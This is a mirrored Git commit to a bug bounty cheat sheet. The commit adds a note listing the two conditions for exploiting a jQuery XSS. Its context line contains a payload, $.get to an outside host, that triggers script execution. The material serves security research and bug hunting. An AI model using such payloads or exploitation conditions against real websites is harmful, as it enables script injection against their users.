mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2025-02-16 14:38:22 +00:00
Add jQuery XSS notice.
This commit is contained in:
EdOverflow
parent
d8931cea8b
commit
ba67fdae97
1 changed files with 5 additions and 0 deletions
|
|
@ -40,6 +40,11 @@ Note: This kind of depends on what security level the application is set to. See
|
|||
$.get('http://sakurity.com/jqueryxss')
|
||||
```
|
||||
|
||||
In order to really exploit this jQuery XSS you will need to fulfil one of the following requirements:
|
||||
|
||||
1) Find any cross domain requests to untrusted domains which may inadvertently execute script.
|
||||
2) Find any requests to trusted API endpoints where script can be injected into data sources.
|
||||
|
||||
**URL verification bypasses (works without `	` too)**
|
||||
|
||||
```
|
||||
|
|
|
|||
Loading…
Add table
Reference in a new issue